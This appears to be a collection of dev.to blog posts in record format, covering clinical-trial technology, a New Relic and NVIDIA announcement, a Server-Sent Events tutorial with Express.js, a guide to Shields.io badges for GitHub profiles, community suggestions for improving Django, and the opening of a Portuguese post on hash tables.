**Remote Monitoring and Reduced Site Burden:** The integration of technology and AI tools has significantly advanced the clinical trial process by enhancing remote monitoring capabilities and reducing the operational burden on trial sites. Historically, sponsors and CROs needed frequent on-site visits to adequately assess trial progress, but modern tools now facilitate robust remote monitoring.
This shift to remote monitoring not only reduces the need for physical site visits, which lowers costs and minimizes disruptions but also enriches the understanding all parties have of the trial's ongoing operations. Additionally, the adoption of straightforward task management tools at clinical trial sites streamlines administrative duties, allowing staff to concentrate more on patient care and data-related work. These developments collectively expedite the trial process while ensuring higher-quality outcomes.
**Improved Compliance and Audit Readiness:** Technological advancements and AI-augmented tools have greatly optimized the clinical trial process by enhancing compliance and audit readiness. Previously, the risk of clerical errors in documentation posed significant challenges. However, modern digital platforms now ensure that all trial documentation and processes adhere rigorously to standards such as Good Clinical Practice (GCP).
This automation and centralization of trial documents can facilitate seamless audit preparation and consistent regulatory compliance. These technological integrations not only mitigate risks but also streamline the management of clinical trial data, ensuring that compliance is maintained throughout the trial lifecycle with unprecedented precision and ease.
**Accelerated Study Timelines:** The integration of technological advancements and AI-augmented tools has been pivotal in accelerating the timelines of clinical trials – and speed is considered one of the four most important [factors in determining the success of a clinical trial](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC10173933/). These innovations smooth the way for a more efficient orchestration of the many diverse components involved in trials.
By automating mundane tasks, enhancing communication channels, and ensuring robust oversight across all stakeholders, these tools markedly reduce the time needed to initiate, manage, and conclude studies. Collectively, these technological enhancements streamline processes, ensuring clinical trials are not only faster but also more adaptable to the dynamic clinical landscape.
## **The Present and Future Effects of Technology in Optimizing Clinical Trials**

Photo by [Unsplash](https://unsplash.com/photos/person-holding-pencil-near-laptop-computer-5fNmWej4tAA)
Technological advancements have significantly refined the clinical trial process, transforming tasks that were once cumbersome into automated functions that enhance focus and reduce human error. With these innovations, oversight has become more straightforward, enabling all parties to stay well-informed and engaged by minimizing the administrative burdens that traditionally slowed progress. Streamlined processes and improved organization contribute to a clinical trial environment that is not only more efficient but also cost-effective. As researchers navigate the evolving landscape of regulatory requirements, these technological tools will continue to prove indispensable in ensuring that the clinical trial process remains both adaptive and resilient.
| mcdowell |
1,899,385 | New Relic Integrates its Observability Platform with NVIDIA NIM to Accelerate AI Adoption and ROI | Hi, devs! Today we're announcing that New Relic and NVIDIA released the first observability... | 0 | 2024-06-24T22:16:30 | https://dev.to/newrelic/new-relic-integrates-its-observability-platform-with-nvidia-nim-to-accelerate-ai-adoption-and-roi-514l | ai, observability | Hi, devs!
Today we're announcing that New Relic and NVIDIA released the first observability integration making it easy for companies to monitor the health and performance of their AI applications built with NVIDIA NIM.
Key features and use cases for AI monitoring include:
- Full AI stack integration
- Deep trace insights for every response
- Model inventory
- Deep GPU insights
- Enhanced data security
➡️ [Check it out](https://newrelic.com/blog/how-to-relic/ai-monitoring-for-nvidia-nim?utm_source=devto&utm_medium=community&utm_campaign=global-fy25-q1-ai-monitoring-for-nvidia-nim)
-Sam
| samanthadondero |
1,898,101 | Getting Started with Server-Sent Events (SSE) using Express.js and EventSource | Server-Sent Events (SSE) is a technology that allows a server to push updates to the client over a... | 0 | 2024-06-24T22:08:45 | https://dev.to/codingwithadam/getting-started-with-server-sent-events-sse-using-expressjs-and-eventsource-2c01 | javascript, webdev, beginners, html | Server-Sent Events (SSE) is a technology that allows a server to push updates to the client over a single HTTP connection. It's a great way to handle real-time data in web applications, offering a simpler alternative to WebSockets for many use cases.
If you prefer watching a tutorial, you can watch the accompanying video here. The video provides a step-by-step guide and further explanations to help you understand SSE better. It goes into more details than the written tutorial below.
{% embed https://youtu.be/ieUsuDsQY0o %}
## Understanding HTTP Requests and Responses
First, let's take a look at how a typical set of HTTP requests and responses work. In the diagram below, you can see that the client opens a connection for a resource such as an image, HTML file, or API call. The client then receives a response, and the connection closes. The client can then open another connection to make another request and receive a response, at which point the connection closes again.

## Understanding Server-Sent Events (SSE)
With Server-Sent Events (SSE), a client can open a connection with a request and keep that connection open to receive multiple responses from the server. Once the connection is open, the communication direction is one-way: from the server to the client. The client cannot make additional requests over the same connection.
The client initiates the connection with a request using an `Accept` header of `text/event-stream`. The server responds with a `Content-Type` of `text/event-stream` and typically uses `Transfer-Encoding: chunked`. This encoding allows the server to send multiple chunks of data without knowing the total size of the response beforehand.
In the diagram below, you can see how the SSE connection is established and how data flows from the server to the client:

## Project Structure
We'll be organizing our project into two main folders: server for the backend and client for the frontend.
```
sse-example/
├── client/
│ ├── index.html
│ └── index.js
└── server/
├── index.js
└── package.json
```
## Setting Up the Server
First, we'll create an Express.js server that can handle SSE connections. You'll need Node.js installed on your machine. Navigate to the server folder and initialize a new Node.js project:
```
mkdir server
cd server
npm init -y
```
Install the necessary dependencies:
```
npm install express cors
npm install --save-dev nodemon
```
To use ES6 imports, make sure your package.json includes "type": "module":
package.json
```
{
"name": "sse-example",
"version": "1.0.0",
"main": "index.js",
"type": "module",
"scripts": {
"start": "nodemon index.js"
},
"dependencies": {
"express": "^4.17.1",
"cors": "^2.8.5"
},
"devDependencies": {
"nodemon": "^2.0.7"
}
}
```
Next, create a file called index.js in the server folder and add the following code:
```
import express from 'express';
import cors from 'cors';
const app = express();
const port = 3000;
app.use(cors());
app.get('/currentTime', (req, res) => {
res.setHeader('Content-Type', 'text/event-stream');
res.setHeader('Cache-Control', 'no-cache');
res.setHeader('Connection', 'keep-alive');
const intervalId = setInterval(() => {
res.write(`data: ${new Date().toLocaleTimeString()}\n\n`);
}, 1000);
req.on('close', () => {
clearInterval(intervalId);
res.end();
});
});
app.listen(port, () => {
console.log(`Server running at http://localhost:${port}`);
});
```
In this code, we create an Express.js server that listens for GET requests on the /currentTime endpoint. The server sets the necessary headers for SSE and sends a timestamp to the client every second as a simple string. We also handle client disconnections by clearing the interval and ending the response.
## Setting Up the Client
For the client side, we'll use a simple HTML file and JavaScript to handle the SSE stream. Create a client folder and create the following files index.html and index.js as per the file structure:
```
sse-example/
├── client/ <-- Here
│ ├── index.html <-- Here
│ └── index.js <-- Here
└── server/
├── index.js
└── package.json
```
index.html
```
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Document</title>
<script defer src="index.js"></script>
<style>
body {
background-color: black;
color: white;
}
</style>
</head>
<body>
<h1 id="time">Time</h1>
</body>
</html>
```
index.js
```
const eventSource = new EventSource('http://localhost:3000/currentTime');
eventSource.onmessage = function(event) {
document.getElementById('time').textContent = `${event.data}`;
};
eventSource.onerror = function() {
console.log("EventSource failed.");
};
```
In this HTML and JavaScript setup, we create a connection to the server using EventSource and update the time displayed in the DOM as new messages are received. We also handle any errors that might occur with the EventSource connection.
## Running the Example
To run the example, start the Express.js server by executing:
```
cd server
npm start
```
Then, open index.html using VS Code Live Server extension. Install VS Code Live server if you have not already by going to the extensions tab and finding `live server` and clicking install. Once installed right click the index.Html file and click `Open With Live Server`. Your default browser will open and you should see see the time being updated every second.
## Conclusion
Server-Sent Events provide an efficient way to handle real-time updates in web applications. With just a few lines of code, you can set up an SSE server and client to stream data seamlessly. Give it a try in your next project and enjoy the simplicity and power of SSE!
Feel free to reach out with any questions or feedback in the comments below. Happy coding! | codingwithadam |
1,899,925 | Adding Shields.io badges to your GitHub profile | Originally published on peateasea.de. A GitHub user profile page can be a great place to show off... | 0 | 2024-06-25T16:10:35 | https://peateasea.de/adding-shields-io-badges-to-github-profile/ | howto, github | ---
title: Adding Shields.io badges to your GitHub profile
published: true
date: 2024-06-24 22:00:00 UTC
tags: HOWTO,GitHub
canonical_url: https://peateasea.de/adding-shields-io-badges-to-github-profile/
cover_image: https://peateasea.de/assets/images/badges-we-aint-got-no-badges-dev-to.png
---
*Originally published on [peateasea.de](https://peateasea.de/adding-shields-io-badges-to-github-profile/).*
A GitHub user profile page can be a great place to show off what you’re interested in and what experience you might have. Rather than presenting a wall of text, you can add colour and flair to the profile in various ways. One way to do this is to show badges of the programming languages, frameworks, and other technologies that you’re interested in. This post shows how to add badges from the badge generator on [Shields.io](https://shields.io) to your GitHub profile.
## GitHub profiles: your own small corner of the internet
Each GitHub user has their own special repository where they can create and personalise their GitHub profile page. This is an opportunity to share who you are, what you do and what you’re interested in. It reminds me a bit of the [GeoCities](https://en.wikipedia.org/wiki/GeoCities)<sup id="fnref:geocities-google" role="doc-noteref"><a href="#fn:geocities-google" rel="footnote">1</a></sup> pages that were once popular in the early years of the web. It was a place where anyone could have a small corner of the internet to display what interested them. As with GeoCities pages, the presentation possibilities are endless: you can add images, use emojis, link to other sites, and much more. You can even add a [visitor](https://dev.to/godspowercuche/add-a-visitor-count-on-your-github-profile-with-one-line-of-markdown-eeb-temp-slug-3411965) [counter](https://github.com/antonkomarev/github-profile-views-counter) for that truly retro feel!
Badges are a common adornment to show off what you like or are involved in. This post focuses on badges and how you can use [Shields.io](https://shields.io) to generate badges for display on your GitHub profile.
### Setting up a profile
After cloning the special repository for your GitHub user profile you can add information to a Markdown-formatted README file in much the same way you would do for any normal GitHub repository. The only difference is that the content of this README appears on your user’s profile page.
The repository has the same name as your GitHub username and [it takes only a few clicks to create your first README](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizing-your-profile/managing-your-profile-readme#adding-a-profile-readme). It seems that [this feature was first added](https://dev.to/tumee/how-to-add-github-profile-readme-new-feature-1gji) [in July 2020](https://medium.com/nerd-for-tech/stand-out-by-personalizing-your-github-profile-f0a5d73f2b4d). More information about managing and customising your profile is available in the [GitHub account and profile documentation](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizing-your-profile/about-your-profile).
### Much more than just badges
It’s taken me a while to get around to creating my GitHub profile. While working out how to set it up, I stumbled upon the [amazing things](https://github.com/abhisheknaiidu/awesome-github-profile-readme) people have on theirs. For instance, you can [automatically link to your most recent blog posts](https://github.com/gautamkrishnar/blog-post-workflow) (from e.g. [dev.to](https://dev.to), [medium](https://medium.com) or via RSS feed), [display various GitHub statistics](https://github.com/anuraghazra/github-readme-stats), [show how long your latest programming streak is](https://github.com/DenverCoder1/github-readme-streak-stats), as well as display [achievement badges](https://shields.io/badges).
For those interested in more than badges, I recommend looking at [K M H Mubin’s extensive post about creating a GitHub README](https://www.linkedin.com/pulse/how-did-github-profile-readmes-become-best-find-out-k-m-h-mubin/). It has a lot of information about the components one could add to a profile README as well as descriptions of how to implement various features.
Another useful resource is the [GitHub README generator](https://rahuldkjain.github.io/gh-profile-readme-generator/). Here, one can specify various pieces of metadata to mention. Creating a list of logos is then a simple matter of clicking on some checkboxes. The tool then generates Markdown and HTML to include in your profile README. All you need to do is copy it into your repository, commit the changes and push to GitHub.
If logos or icons are more your thing, and you’re looking for an alternative to badges, then have a look at [VectorLogoZone](https://www.vectorlogo.zone/), [Devicon](https://devicon.dev/), or [Iconify](https://iconify.design/). These sites contain SVG versions of logos and icons from many different projects. Iconify in particular includes an enormous number of icons, organised into categories for easy browsing.
Let’s get back on track and focus on creating badges with Shields.io.
## Badges
There are three kinds of badges one can create on Shields.io: dynamic badges, endpoint badges and static badges. Dynamic badges fetch information from a given online source and present this information within the badge body. [Endpoint badges](https://shields.io/badges/endpoint-badge) are created via a JSON endpoint and are beyond the scope of this post. Static badges contain pre-defined text and/or logos.
### Dynamic badges
There are hundreds of dynamic badges available on [Shields.io](https://shields.io/badges) for you to create. Most dynamic badges seem to be based upon displaying status metadata for software projects. For instance, you might want to show users the current version number, what the build status is, or how much code coverage a service such as [Coveralls](https://coveralls.io/) shows. These aren’t necessarily the kinds of things you want to mention on your GitHub profile. However, if you’re that way inclined, you could display social-media-related metadata, such as the number of Mastodon or ~~Twitter~~ X followers you have, or the number of views on YouTube channel. For badges of this kind, check out the “Social” section on the [Shields.io badges page](https://shields.io/badges).
### Static badges
As mentioned earlier, you’ll likely want to mention the programming languages and tools you use or are generally interested in on your GitHub profile page. For this purpose the static badges are perfect. For the rest of this post, we’re going to concentrate only on static badges.
Shields.io works together with [Simple Icons](https://simpleicons.org/), a site where you can find SVG icons for popular brands. This is particularly useful if you want to use a pre-existing logo as part of your badge. Often, you’ll need to collect some basic information from the Simple Icons site to create a static badge correctly.
The [static badge page](https://shields.io/badges/static-badge) contains a badge generator on the right-hand side of the page (shown in the bright orange frame in the image below).

We’ll use this generator to create Markdown which you can put in your GitHub profile `README.md` file and thus add badges to your GitHub profile.
### A two-part badge
Let’s start with the first example from the [Shields.io static badges documentation](https://shields.io/badges/static-badge): a two-part badge.
A two-part badge consists of a left-hand side (referred to in the documentation as the “label”) containing text and an optional logo, as well as a right-hand side (referred to as the “message”) which usually contains only text. Each part can be configured to have different text and background colours. You’re likely to have seen the two-part badge style in such things as a [CI pipeline’s build status badge](https://docs.github.com/en/actions/monitoring-and-troubleshooting-workflows/adding-a-workflow-status-badge).
The Shields.io API allows you to create badges in this style very easily: specify within the `badgeContent` field the label text, message text, and colour each separated by a hyphen. For instance, let’s consider the example from the documentation: `build-passing-brightgreen`. This will put the word “build” in the badge’s label part, the word “passing” in the message part, and will use the [CSS named colour](https://developer.mozilla.org/en-US/docs/Web/CSS/named-color) “brightgreen” as the background colour in the badge’s message part. It seems that the default background colour for the label part is black.
Let’s see this in action. Enter `build-passing-brightgreen` into the `badgeContent` field in the static badge generator and then click on the “Execute” button. You’ll get the following:

Congratulations! You’ve created your first badge!
As you can see from the output, not only did the generator produce an image, but also a URL pointing to the Shields.io API which generates the image. This URL can then be embedded in a website so that the image is generated on the fly when a user visits your page. One can also choose from other options to link to the generated badge image:[Markdown](https://daringfireball.net/projects/markdown/syntax), [rSt](https://docutils.sourceforge.io/rst.html), [AsciiDoc](https://asciidoc.org/) and [HTML](https://en.wikipedia.org/wiki/HTML). In this article, we’re going to focus on the Markdown output because this is what is commonly used on GitHub for project and profile page README files.
### A single-part badge
The other kind of static badge that you can generate on Shields.io is the single-part badge. This kind of badge only contains a message, i.e. there’s no “label” component. You can also configure it to have different text and background colours as we did with the two-part badge above. For instance, using the text [“lorem ipsum”](https://en.wikipedia.org/wiki/Lorem_ipsum) and specifying the colour purple by entering `lorem ipsum-purple` into the `badgeContent` field of the badge generator, we get:

Note that we only use one hyphen in this case because the badge only contains a message along with its background colour definition.
When using multiple words to specify the message text, one can separate them by plain spaces in the `badgeContent` field. These spaces will be converted via [percent encoding](https://en.wikipedia.org/wiki/Percent-encoding) into the text `%20` within the URL created by the badge generator. If you want to avoid percent encoding strings appearing in your URLs, separate words by underscores in the `badgeContent` field. The text in the badge will be separated by spaces, but the URL will be easier to read because it will use underscores.
For example, using `lorem_ipsum-purple` produces the same badge, but a more readable URL:

### Flexible colour specification
Not only can you specify the badge’s background colour by using a [CSS named colour](https://developer.mozilla.org/en-US/docs/Web/CSS/named-color), but you can also have fine-grained control over the colour by using a [hex](https://en.wikipedia.org/wiki/Web_colors#Hex_triplet), [rgb](https://en.wikipedia.org/wiki/RGB_color_model), [rgba](https://en.wikipedia.org/wiki/RGBA_color_model), [hsl](https://en.wikipedia.org/wiki/HSL_and_HSV), or hsla string. For instance, using the example on the static badges page, we use the hex string `8A2BE2` to define the colour:

### Shady colour intelligence
Playing around a bit with the colours, one can see that there’s some built-in intelligence in the Shields.io system controlling the contrast between the background colour and the foreground text. E.g. the text will be white if the background is dark

and the text will be black if the background is light.<sup id="fnref:note-about-colour-choices" role="doc-noteref"><a href="#fn:note-about-colour-choices" rel="footnote">2</a></sup>

### Badge not found
Note that if you don’t have at least two text “fields” separated by a hyphen (or there is some other error in your input), you will get a “badge not found” error. Rather appropriately, this will appear as a badge:

### Lots of options to choose from
As you can see, there’s already lots of range and flexibility in what one can create using only the default settings. Let’s now create badges for more specific use cases and thus demonstrate more of the options available on Shields.io.
## A badge for Git
Let’s now be a bit more concrete and create a badge for Git.
### A very basic example
A fundamental skill a programmer has to have is the ability to work with [version control systems](https://en.wikipedia.org/wiki/Version_control)(VCS). [Git](https://git-scm.com/) is the most common VCS these days, so you’ll likely want to add a badge for it to your GitHub profile. Fortunately, it’s also a good example of a basic badge setup.
One of the simplest things to begin with is to create a badge with the word `git` on a black background. To do this, type `git-black` into the `badgeContent` field in the badge generator and then click on the “Execute” button. A small badge with the word `git` in white text on a black background will appear below the “Execute” button.

Admittedly, this isn’t very exciting, but it’s a start.
### Including the project’s logo
A nice touch is to add a logo to the badge because often a brand logo is immediately recognisable. This is where the badge generator’s “+ Show optional parameters” section comes in. Clicking on this text shows the many other parameters one can set (there are parameter docs on the page with the badge generator if you need more help).
Now enter `git` into the `logo` field:

Scrolling down to the “Execute” button and clicking on it (and selecting “Markdown” from the list of text output options) we get

As you can see, the logo appears with the right design and colours that we’re familiar with from the [Git project](https://git-scm.com/).
### Generating Markdown for the GitHub profile’s README.md
We can now take the Markdown text (not all of it is visible in the badge generator output from the screenshot above)
```markdown

```
and paste it into our GitHub profile’s `README.md` file to add the badge. Unfortunately, the badge image’s alt-text `Static Badge` isn’t very informative, so let’s change that:
```markdown

```
In essence, that’s it! If you’ve already added this Markdown code to your GitHub profile README and pushed upstream, you’ve published your first badge. Well done!
### Plain and simple, if that’s to your taste
Now we start to enter the realm of personal taste. One variation on the theme outlined above could be to use the project logo’s main colour as the badge’s background colour and then use plain white for the logo and text colour. Let’s implement this variation now.
To find out the project logo’s colour as a hex value, visit [Simple Icons](https://simpleicons.org) (which is what Shields.io uses to generate the logos in the badges) to find what colour to use. Because we’re focussing on Git here, we visit the Simple Icons site and type `git` into the search field. The search results will show many different Git-related projects including GitLab, GitHub and GitKraken. We’re only interested in the first search result, Git. You should see an informational panel like this:

The informational panel displayed on the Simple Icons site shows relevant metadata about the logo: a black-and-white SVG version of the logo, licensing information, the name of the project, and the logo’s colour (both the actual colour and a hex string representing the colour). Clicking on the colour information automatically copies the hex string into the clipboard so that we can use this information straight away in the Shields.io badge generator.
In the case here, the hex string for the colour of the Git project is `#F05032`. Returning to Shields.io and replacing the string `git-black` in the `badgeContent` field with `git-#F05032`

and then scrolling down to the “Execute” button and clicking on it, gives

which isn’t very useful, because now the logo and the background are the same colour. Oops.
Let’s fix this by changing the `logoColor` parameter to `white` and running “Execute” again. This gives

which is much more useful and is a simpler version of the badge with the black background we created above. The Markdown for this badge is
```markdown

```
Fixing the alt-text we get
```markdown

```
Note how the parameters are embedded into the URL for the badge. This means that it’s possible to play with the options within the text of a `README.md` file as opposed to testing things first in the Shields.io badge generator and then copy-and-pasting the Markdown into the `README.md`. Try playing around with the parameters to see what you can come up with!
## Building a basic Bash badge
Not all logo designs play nicely with default background colours and text or have the logo name one might first expect. One I found to have an unexpected logo name and that was difficult to get a nice contrast while still including the official project colour was the [Bash logo](https://simpleicons.org/?q=gnubash).
I’ll show you what I mean by building a badge for bash.
Visiting the [Simple Icons site](https://simpleicons.org) and typing `bash` into the search box returns–as one of the search results–the logo entry for our familiar shell.

Clicking on the name in the info panel copies the logo name<sup id="fnref:logo-name-aka-slug" role="doc-noteref"><a href="#fn:logo-name-aka-slug" rel="footnote">3</a></sup> into the clipboard so that you can paste the value into the `logo` field of the badge generator on Shields.io. For Bash this value is `gnubash`. This surprised me. My gut feeling was that it would have been called `bash`. But I was wrong and only worked out the correct name by clicking on the name in the logo’s info panel on Simple Icons. At least now it’s clear to me why using `bash` in the badge generator’s `logo` field [didn’t generate a badge](#badge-not-found).
Let’s use some basic settings to see what happens. Let’s put `bash-black` in the `badgeContent` field and `gnubash` in the `logo` query field. Doing so we get:

which I don’t find to be very clear.
Using a white background (i.e. `badgeContent: bash-white`) we get a visually clearer variant:

However, if we want to use Bash’s official colour (`#4EAA25`) for the background (i.e. `badgeContent: bash-#4EAA25`) and white for the logo foreground (`logoColor: white`)–thus matching the second badge style described in the Git section above–we get

This variant is also not very clear. How could we improve this?
One idea I came up with was to use the two-box form for the badge and put the logo on the left-hand side with black in the foreground and white in the background. Then the right-hand side would contain the text in white and use the official logo’s colour as the background.
The settings are now: `badgeContent: bash-#4EAA25`, `logo: gnubash`, `logoColor: black`, `labelColor: white`.
Putting these parameters into the badge generator and clicking on “Execute” creates this badge:

which I considered to be a good compromise between using the official project colour, its logo, and the contrast between background and foreground colours.
The Markdown generated for this badge setup is:
```markdown

```
after having improved the alt-text.
Now it’s just a matter of adding this Markdown to your GitLab profile’s `README.md` and you’ve got another badge to present. Yay! :tada:
## Much more variation possible
Now that you’ve seen how to create a more complex badge, I hope you’ve gained some insight into what’s possible with Shields.io’s badge generator.
The Shields.io docs are a bit sparse, so be aware that it might not always be clear exactly how to use a parameter. Be prepared to do a bit of experimentation to create a badge with the desired properties.
There are many more options you can play with, so don’t restrict yourself to only those designs I’ve discussed here: have a play and see what you come up with!
## Linking to other sites from `for-the-badge` style badges
The default `flat` style (as used above) is fairly typical for displaying programming languages or technologies that you have experience with. For buttons or badges linking to a social media presence, a blog, or a website, you might like to use a different style of badge. After all, [different things should look different](https://perl.org.il/presentations/larry-wall-present-continuous-future-perfect/transcript.html#Why_Perl_Evolved_As_It_Did_.283:54.29). One style I find that lends itself to linking to external sites is the `for-the-badge` style.
At first, it wasn’t clear to me what `for-the-badge` referred to. It turns out that it’s a badge style popularised by the site [https://forthebadge.com/](https://forthebadge.com/) which Shields.io implemented after receiving a [feature request for for-the-badge-style badges](https://github.com/badges/shields/issues/818).
To illustrate this idea, let’s create a Mastodon badge and link it to a Mastodon user’s profile page.
### Creating a Mastodon badge
Setting up a Mastodon badge in the `for-the-badge` style with a black background and the official Mastodon logo, we use these parameters

Clicking on the “Execute” button gives this output

This badge looks quite nice and we could copy the Markdown into our GitHub profile’s `README.md` file
```markdown

```
however something’s not quite right here.
### Linking badges to URLs
The problem is that this Markdown code doesn’t link anywhere. It’d be nice if it linked to (say) your Mastodon profile. This way a visitor to your GitHub profile could click on the Mastodon badge and then see who you are on the [fediverse](https://en.wikipedia.org/wiki/Fediverse).
Interestingly enough, GitHub will automatically create a link to `camo.githubusercontent.com` from the badge on your profile. Clicking on the badge (and thus the link) will open a page containing only the badge, which isn’t very helpful.
It’s possible to add a `link` to our badge in the badge generator settings. Had we done that, the badge now sitting alone on its own page would then link to where we wanted the user to go in the first place (to visit the link, you click on the badge again). In my opinion, having to click twice on the same badge to get to where the badge is purporting to link to isn’t very clear [UX](https://en.wikipedia.org/wiki/User_experience_design). Surely there’s another way.
Because I couldn’t get the `link` parameter to work properly,<sup id="fnref:html-object-tag" role="doc-noteref"><a href="#fn:html-object-tag" rel="footnote">4</a></sup> I came up with a solution which embeds the image within the link text of a normal Markdown link. The URL of where you want the badge to link to is thus in the parentheses of the Markdown link as per normal.
You can embed the image with an [HTML `<img>` tag](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/img) like so:
```markdown
[<img src="https://img.shields.io/badge/mastodon-black?style=for-the-badge&logo=mastodon">](https://mastodon.social/@<mastodon-username>)
```
or by embedding a Markdown image
```markdown
[](https://mastodon.social/@<mastodon-username>)
```
which looks a bit more complicated, but allows you to add an alt-text for the image in the familiar Markdown manner.
An alternative solution involves saving the badge’s SVG generated after the “Execute” step (for example, right-click on the badge and select “Save Image As…”). Then your Markdown code would look like this:
```markdown
[](https://mastodon.social/@<mastodon-username>)
```
This solution has the advantage that you don’t have to rely on an online service to generate badge images each time someone visits your GitHub profile.
Now you’re able to create badges which link to any other presence you have online. Brilliant!
## Wrapping up
Personalising your GitHub profile gives visitors insights into what kind of developer you are, what you’re interested in and what you can do. It’s a little corner of the internet that you can set up to be “just yours” and where you can show off a bit of your personality. Adding badges to your page gives a good overview of your skills and interests, as well as providing a dash of colour to what might otherwise be a very plain wall of text.
There’s heaps of variety here and lots of flexibility available to create the badges you want to display on your GitHub profile. Have fun!
1. I found out that if you search for GeoCities in Google, the results are displayed in Comic Sans! :laughing: [↩](#fnref:geocities-google)
2. You may be wondering why I chose blue and beige here for the dark and light colours (respectively). I didn’t want to use black and white because these colours have too much contrast. I wanted something dark (light) but not the darkest (lightest) one could have to demonstrate the automatic choice of good contrast text. [↩](#fnref:note-about-colour-choices)
3. The logo name as used in the `logo` field on Shields.io is also referred to as a [slug](https://www.dictionary.com/browse/catchline) in the Shields.io documentation. [↩](#fnref:logo-name-aka-slug)
4. The [static badge docs](https://shields.io/badges/static-badge) mention using the [HTML `<object>` tag](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/object), but I couldn’t get that to work either. [↩](#fnref:html-object-tag) | peateasea |
1,898,209 | How to improve Django Framework? | On June 21, 2024 I started a thread on reddit with the following question: “What would you improve... | 0 | 2024-06-24T16:17:37 | https://coffeebytes.dev/en/how-to-improve-django-framework/ | opinion, django, python, architecture | ---
title: How to improve Django Framework?
published: true
date: 2024-06-24 22:00:00 UTC
tags: opinion,django,python,architecture
canonical_url: https://coffeebytes.dev/en/how-to-improve-django-framework/
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e35vipj8we7kvoclyrnn.jpg
---
On June 21, 2024 I started a thread on reddit with the following question: “What would you improve about Django framework?”. The response from the community was immediate and the conversation quickly filled up with suggestions on how to improve Django framework, ranging from modest to quite radical. I summarize the results below.

_HTMX meme_
## Would type hints improve Django Framework?
This was the comment that received the most support from the community. Although Python already has optional Type Hints since version 3.5, it seems that implementing them for the purpose of modernizing Django Framework does not seem to be a priority.

_Comment with more support on how to improve Django_
The popularity of type hints is such that some users who consider them a significant improvement to the framework have developed [an external library, called django-stubs](https://github.com/typeddjango/django-stubs), which aims to revamp the Django Framework with type hints.
### Type hints have already been evaluated and rejected.
However, according to reddit users, there is not much interest from the code maintainers to incorporate these changes as part of the code. There have even been [proposals to incorporate type hints into the official Django repository](https://github.com/django/deps/pull/65), but these changes have been dismissed, probably because they consider the typing to be a contradiction to the nature of Python as a dynamic language.
In case you don't know what type hints are, type hints allow you to declare the type of a variable, argument, or the return value of a function to make it easier to identify bugs or unwanted behavior. Think of Python type hints as Python's Typescript, or as optional static typing in your favourite compiled language, such as C, C++, or Rust.
## Use a custom User model instead of the normal User model.
The second comment that received the most support states that customizing Django’s User model is quite complicated, especially if done mid-project, more specifically changing Django’s default login type from user to email.

_Second comment with most support on how to improve Django_
Although there are multiple ways to [customize the User model in Django](https://coffeebytes.dev/en/how-to-customize-the-user-model-in-django/), such as using a proxy model, or inheriting from _AbstractUser_, some users find that solution a little bit “hackish”.
In case you don't know, Django uses by default the \*username\* from its \*User\* model, in combination with the password, to log in a user. But the current trend in web development is to use email directly.
## REST support in Django without third-party libraries.
Despite the fact that Django has one of the best libraries to create an application that meets the [basic features of a REST API](https://coffeebytes.dev/en/basic-characteristics-of-an-api-rest-api/); yes, I’m talking about DRF (Django Rest Framework). The reddit users consider that Django should provide support for REST APIs “out of the box”, as a native part of the framework.
The above seems to me an interesting proposal but I also understand that, despite the maturity of REST, giving it preference over the rest of APIs, such as [the modern Google gRPC](https://coffeebytes.dev/en/unleash-your-apis-potential-with-grpc-and-protobuffers/), SOAP, or some API that has not yet emerged, can be considered as a rather risky step by the Django committee. Yes, even if there are complete REST-based libraries, such as [FastAPI](https://coffeebytes.dev/en/fastapi-tutorial-the-best-python-framework/).
## Read environment variables in Django without third-party libraries
Django can read environment variables directly using Python’s _os_ library, but other libraries, such as [django-environ](https://django-environ.readthedocs.io/en/latest/), have been developed to provide a more robust solution, where it reads directly from an _.env_ file and where the absence of an environment variable will crash the application, ensuring that a Django application cannot start if even one environment variable is missing, which is what I imagine the developers of this popular forum want.
``` python
import os
os.environ["VARIABLE"]
```
### Other frameworks that do read environment variables
Contrary to Django, frameworks like Nextjs load environment variables by default and even allow you to make some of them public with the _NEXT\_PUBLIC\__ prefix, but in the case of Django you need to load the required variables manually or use a third-party library.
## Django native integration with frontend
It’s no secret that the frontend has received a gigantic boost in recent years, libraries like React, Vue, Svelte and others have taken a remarkable prominence in recent years, completely changing the paradigm of client-side development. Django has been agnostic about the separation between Backend and Frontend, probably because [Django is a monolithic framework](https://coffeebytes.dev/en/why-should-you-use-django-framework/) (and I mean that in a non-pejorative way).
I guess some users consider that Django should not lag behind and should provide integration options with some frontend libraries to favor the reactivity of the applications, as Nextjs does for some time, since it allows you to select the frontend library to work with and even takes care of the minification and tree-shaking of the code through Webpack or its experimental compiler written in Rust.
### Improving Django with HTMX
It seems to me that Django already does an excellent job with its template system and that it combines perfectly with [libraries like HTMX](https://coffeebytes.dev/en/django-and-htmx-modern-web-apps-without-writing-js/), to take advantage of all the power of hypertext without the need to incorporate Javascript to the project.

_Javascript delusion according to HTMX_
Without more to add I leave the link to the discussion if you want to see the rest of [suggestions on how to improve Django Framework.](https://www.reddit.com/r/django/comments/1dlj5n6/what_would_you_improve_about_django_framework/)
## Other suggestions on how to improve Django framework
Among the other suggestions I would like to highlight the following, as they received minor support or were mentioned multiple times throughout the thread:
- Better form handling
- Better static content handling with emphasis on most popular frontend frameworks
- Out of the box support for queues
- Hot reload of the browser
- Basic CRUD boilerplate generator
- Models’ auto prefetch of their related models.
### Suggestions that ended up being third party libraries
- [Static types and type inference for Django framework](https://github.com/typeddjango/django-stubs/)
- [Form handling for Django with steroids](https://docs.iommi.rocks/en/latest/)
- [CRUD capabilities for Django out of the box](https://noumenal.es/neapolitan/) | zeedu_dev |
1,899,335 | Uma Introdução às HashTables | Na sua carreira como desenvolvedor você provavelmente já se deparou com esse conceito, seja para... | 0 | 2024-06-24T21:55:36 | https://dev.to/pedromiguelmvs/uma-introducao-as-hashtables-201e | programming, development, softwaredevelopment, csharp | Na sua carreira como desenvolvedor você provavelmente já se deparou com esse conceito, seja para agrupar dados ou mesmo para aumentar a performance de um algoritmo, afinal de contas, HashTables são uma das estruturas de dados mais simples e performáticas para a resolução de problemas, mas talvez você nunca tenha se aprofundado nesse assunto. É isso que faremos hoje.
**O que é uma HashTable?**
